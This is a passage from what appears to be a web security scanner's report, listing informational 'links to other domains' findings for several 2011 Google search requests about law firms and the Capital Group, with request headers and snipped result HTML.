<h3 class="r"><a href="http://businessdirectory.bizjournals.com/cincinnati/legal/3217600/peck--shaffer---williams-llp.html" class=l onmousedown="return clk(this.href,'','','','5','','0CDYQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iCvQJT_R4V8J:businessdirectory.bizjournals.com/cincinnati/legal/3217600/peck--shaffer---williams-llp.html+Peck+Shaffer&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD4QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/view/2577454_1" class=l onmousedown="return clk(this.href,'','','','6','','0CEAQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Q8_Xtp4tPrIJ:pview.findlaw.com/view/2577454_1+Peck+Shaffer&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEUQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/companies/peck-shaffer-%26-williams?trk=ppro_cprof&amp;lnk=vw_cprofile" class=l onmousedown="return clk('http://www.linkedin.com/companies/peck-shaffer-%26-williams?trk=ppro_cprof&lnk=vw_cprofile','','','','7','','0CEcQFjAG')"><em>
...[SNIP]...
<h3 class="r"><a href="http://atlanta.citysearch.com/profile/45683081/atlanta_ga/peck_shaffer_williams_llp.html" class=l onmousedown="return clk(this.href,'','','','8','','0CEwQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Q-1x2N0Ok20J:atlanta.citysearch.com/profile/45683081/atlanta_ga/peck_shaffer_williams_llp.html+Peck+Shaffer&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFMQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gbltd.com/case-studies/peck-shaffer" class=l onmousedown="return clk(this.href,'','','','9','','0CFQQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:236g5ecBXdYJ:www.gbltd.com/case-studies/peck-shaffer+Peck+Shaffer&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elawmarketing.com/portfolio/email-marketing/peck-shaffer" class=l onmousedown="return clk(this.href,'','','','10','','0CFoQFjAJ')">Email newsletter for <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IE_45NfbGm0J:www.elawmarketing.com/portfolio/email-marketing/peck-shaffer+Peck+Shaffer&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CF8QIDAJ')">Cached</a>
...[SNIP]...
24.21. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Semmes%2C+Bowen+%26+Semmes&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:02:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74627

<!doctype html> <head> <title>Semmes, Bowen &amp; Semmes - Google Search</title> <script>window.google={kEI:"hwTMTfygLsfL0QHOr6jjBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Semmes,+Bowen+%26+Semmes&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.semmes.com/attorney_search.asp" class=l onmousedown="return clk(this.href,'','','','2','','0CCIQFjAB')">Attorney/Professional Search | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lbteYv-OCtAJ:www.semmes.com/attorney_search.asp+Semmes,+Bowen+%26+Semmes&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:lbteYv-OCtAJ:www.semmes.com/attorney_search.asp+Semmes,+Bowen+%26+Semmes&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.semmes.com/offices/default.asp" class=l onmousedown="return clk(this.href,'','','','3','','0CCkQFjAC')">Baltimore Office of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QJ38gHi-z3UJ:www.semmes.com/offices/default.asp+Semmes,+Bowen+%26+Semmes&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:QJ38gHi-z3UJ:www.semmes.com/offices/default.asp+Semmes,+Bowen+%26+Semmes&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CC4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.semmes.com/contactus.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CDAQFjAD')">Contact Us | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JjFF_DdJ5soJ:www.semmes.com/contactus.asp+Semmes,+Bowen+%26+Semmes&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:JjFF_DdJ5soJ:www.semmes.com/contactus.asp+Semmes,+Bowen+%26+Semmes&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDUQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.semmes.com/about/history.asp" class=l onmousedown="return clk(this.href,'','','','5','','0CDcQFjAE')">History :: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LwdK2LtK3l4J:www.semmes.com/about/history.asp+Semmes,+Bowen+%26+Semmes&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:LwdK2LtK3l4J:www.semmes.com/about/history.asp+Semmes,+Bowen+%26+Semmes&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CDwQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Virginia/Vienna/Semmes,-Bowen-and-Semmes,-A-Professional-Corporation-1740867-f.html" class=l onmousedown="return clk(this.href,'','','','6','','0CD8QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M4UiF2W5uVQJ:www.lawyers.com/Virginia/Vienna/Semmes,-Bowen-and-Semmes,-A-Professional-Corporation-1740867-f.html+Semmes,+Bowen+%26+Semmes&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:M4UiF2W5uVQJ:www.lawyers.com/Virginia/Vienna/Semmes,-Bowen-and-Semmes,-A-Professional-Corporation-1740867-f.html+Semmes,+Bowen+%26+Semmes&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Semmes-Bowen-Semmes-A-Professional/law-firm-313045.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CEcQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:N8FR1qOlnMAJ:www.martindale.com/Semmes-Bowen-Semmes-A-Professional/law-firm-313045.htm+Semmes,+Bowen+%26+Semmes&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:N8FR1qOlnMAJ:www.martindale.com/Semmes-Bowen-Semmes-A-Professional/law-firm-313045.htm+Semmes,+Bowen+%26+Semmes&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/semmes-bowen-&amp;-semmes" class=l onmousedown="return clk(this.href,'','','','8','','0CE4QFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QjEQHhM52jAJ:www.linkedin.com/company/semmes-bowen-%26-semmes+Semmes,+Bowen+%26+Semmes&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:QjEQHhM52jAJ:www.linkedin.com/company/semmes-bowen-%26-semmes+Semmes,+Bowen+%26+Semmes&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFMQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/maryland/lawfirm/Semmes-Bowen-and-Semmes-PC/6866f571-8c86-42ab-8b83-2ff3d1901c9d.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFUQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tJl0-3x-A0wJ:www.superlawyers.com/maryland/lawfirm/Semmes-Bowen-and-Semmes-PC/6866f571-8c86-42ab-8b83-2ff3d1901c9d.html+Semmes,+Bowen+%26+Semmes&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:tJl0-3x-A0wJ:www.superlawyers.com/maryland/lawfirm/Semmes-Bowen-and-Semmes-PC/6866f571-8c86-42ab-8b83-2ff3d1901c9d.html+Semmes,+Bowen+%26+Semmes&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFoQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.climber.com/career-research-resources/company-ratings/136301/Legal-Services/Semmes-Bowen-Semmes" class=l onmousedown="return clk(this.href,'','','','10','','0CFsQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:8HwVib6PDXAJ:www.climber.com/career-research-resources/company-ratings/136301/Legal-Services/Semmes-Bowen-Semmes+Semmes,+Bowen+%26+Semmes&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:8HwVib6PDXAJ:www.climber.com/career-research-resources/company-ratings/136301/Legal-Services/Semmes-Bowen-Semmes+Semmes,+Bowen+%26+Semmes&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGAQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=4595148" class=l onmousedown="return clk(this.href,'','','','11','','0CGIQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uYRT7R9-ltwJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D4595148+Semmes,+Bowen+%26+Semmes&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uYRT7R9-ltwJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D4595148+Semmes,+Bowen+%26+Semmes&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CGcQIDAK')">Cached</a>
...[SNIP]...
24.22. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Powell+Trachtman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:04:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 67840

<!doctype html> <head> <title>Powell Trachtman - Google Search</title> <script>window.google={kEI:"JwXMTZGLGM650QG16eTNBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,297
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Powell+Trachtman&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.powelltrachtman.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:8TUdKnyR21cJ:www.powelltrachtman.com/+Powell+Trachtman&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.powelltrachtman.com/CM/Custom/Attorneys.asp" class=l onmousedown="return clk(this.href,'','','','2','','0CCAQFjAB')">Attorney Profiles - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mr5eJQLbdjEJ:www.powelltrachtman.com/CM/Custom/Attorneys.asp+Powell+Trachtman&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.powelltrachtman.com/bio/DavidBurkholder.asp" class=l onmousedown="return clk(this.href,'','','','3','','0CCcQFjAC')">Attorney David Burkholder, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:j0NkvvjKIyIJ:www.powelltrachtman.com/bio/DavidBurkholder.asp+Powell+Trachtman&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.powelltrachtman.com/Bio/FrederickBrehm.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CC4QFjAD')">Attorney Frederick Brehm, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7DDAg-di8Z4J:www.powelltrachtman.com/Bio/FrederickBrehm.asp+Powell+Trachtman&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/view/2069028_1" class=l onmousedown="return clk(this.href,'','','','5','','0CDYQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:v-15y3pGgA4J:pview.findlaw.com/view/2069028_1+Powell+Trachtman&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDsQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/view/3083887_1" class=l onmousedown="return clk(this.href,'','','','6','','0CD0QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:gJ0X-_f_XkgJ:pview.findlaw.com/view/3083887_1+Powell+Trachtman&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEIQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/companies/powell-trachtman" class=l onmousedown="return clk(this.href,'','','','7','','0CEUQFjAG')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Powell,-Trachtman,-Logan-Carrle-%26-Lombardo,-P.c." class=l onmousedown="return clk('http://www.indeed.com/cmp/Powell,-Trachtman,-Logan-Carrle-%26-Lombardo,-P.c.','','','','8','','0CEoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uS25JqBASBgJ:www.indeed.com/cmp/Powell,-Trachtman,-Logan-Carrle-%2526-Lombardo,-P.c.+Powell+Trachtman&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uS25JqBASBgJ:www.indeed.com/cmp/Powell,-Trachtman,-Logan-Carrle-%2526-Lombardo,-P.c.+Powell+Trachtman&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CE8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://careers.lawjobs.com/jobs/da-employer-details-489654-powell-trachtman-logan-carrle-lombardo-p-c/" class=l onmousedown="return clk(this.href,'','','','9','','0CFAQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nNxn14cCUPcJ:careers.lawjobs.com/jobs/da-employer-details-489654-powell-trachtman-logan-carrle-lombardo-p-c/+Powell+Trachtman&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFUQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/pennsylvania/lawfirm/Powell-Trachtman-Logan-Carrle-and-Lombardo-PC/69b81331-a388-4a23-b868-d74a12662f75.html" class=l onmousedown="return clk(this.href,'','','','10','','0CFYQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QjVHL4GkyFsJ:www.superlawyers.com/pennsylvania/lawfirm/Powell-Trachtman-Logan-Carrle-and-Lombardo-PC/69b81331-a388-4a23-b868-d74a12662f75.html+Powell+Trachtman&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFsQIDAJ')">Cached</a>
...[SNIP]...
24.23. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=www.capgroup.com&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=dv2klsvhq6Vyg_9uqB5LJLpC397r5yFl9XjJmEvEWJ6QDPeIwsVE0OZ61NlYufWSxmjKyrIvXenGBLy3phyKoxETz_6hSSYQ49bq5s2GKXEN510GOqtUDfXjbe5pan5Q

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:44:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 68164

<!doctype html> <head> <title>www.capgroup.com - Google Search</title> <script>window.google={kEI:"nDjMTd6iFcPagQeCuPDiBQ",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,297
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=www.capgroup.com&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.capgroup.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">The Capital Group Companies</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_2XY91VDvlsJ:www.capgroup.com/+www.capgroup.com&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.capgroup.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Career opportunities</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.capgroup.com/about_us/" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">About us</a></div><div class=sld><a class=sla href="http://www.capgroup.com/websites.html" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Our websites</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.capgroup.com/our_services/" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">Our services</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.capgroup.com/mediarelations.html" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">Media relations</a>
...[SNIP]...
<h3 class="r"><a href="http://www.capgroup.com/careers/" class=l onmousedown="return clk(this.href,'','','','2','','0CCQQFjAB')">The Capital Group Companies: Career opportunities</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ufSmR4f9Uu0J:www.capgroup.com/careers/+www.capgroup.com&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCkQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.capgroup.com/about_us/" class=l onmousedown="return clk(this.href,'','','','3','','0CCsQFjAC')">The Capital Group Companies: About us</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ELLVAiZRBPcJ:www.capgroup.com/about_us/+www.capgroup.com&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDAQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.capgroup.com/TAP/" class=l onmousedown="return clk(this.href,'','','','4','','0CDIQFjAD')">The Capital Group Companies: Student Center: The Associates <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AK5xmsdLMVsJ:www.capgroup.com/TAP/+www.capgroup.com&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.capgroup.com/websites.html" class=l onmousedown="return clk(this.href,'','','','5','','0CDkQFjAE')">The Capital Group Companies: Our websites</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:b_WFcobpkl8J:www.capgroup.com/websites.html+www.capgroup.com&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD4QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://server.capgroup.com/capitalinternational/private_equity/" class=l onmousedown="return clk(this.href,'','','','6','','0CEAQFjAF')">Capital International Private Equity - Capital Institutional <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OzfppFbHo3UJ:server.capgroup.com/capitalinternational/private_equity/+www.capgroup.com&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEUQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://bizinformation.co/www.capgroup.com" class=l onmousedown="return clk(this.href,'','','','7','','0CEcQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9ducQd4pTI8J:bizinformation.co/www.capgroup.com+www.capgroup.com&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.thecapgroup.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CE0QFjAH')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uH_8J_BRuIoJ:www.thecapgroup.com/+www.capgroup.com&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFIQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://foontic.net/www.capgroup.com" class=l onmousedown="return clk(this.href,'','','','9','','0CFQQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XUdLTYdrttUJ:foontic.net/www.capgroup.com+www.capgroup.com&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.robtex.com/dns/www.capgroup.com.html" class=l onmousedown="return clk(this.href,'','','','10','','0CFoQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NGl91HCZzAcJ:www.robtex.com/dns/www.capgroup.com.html+www.capgroup.com&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGMQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.capitalinternationalfunds.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGUQoggwCg')">Capital International Funds</a>
...[SNIP]...
<div><a href="http://www.americanfunds.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGcQoggwCw')">American Funds</a>
...[SNIP]...
<div><a href="http://www.capitalinternational.ca/" class=l onmousedown="return clk(this.href,'','','','13','','0CGkQoggwDA')">Capital International Asset Management</a>
...[SNIP]...
<div><a href="http://www.blackrock.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGsQoggwDQ')">BlackRock</a>
...[SNIP]...
24.24. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

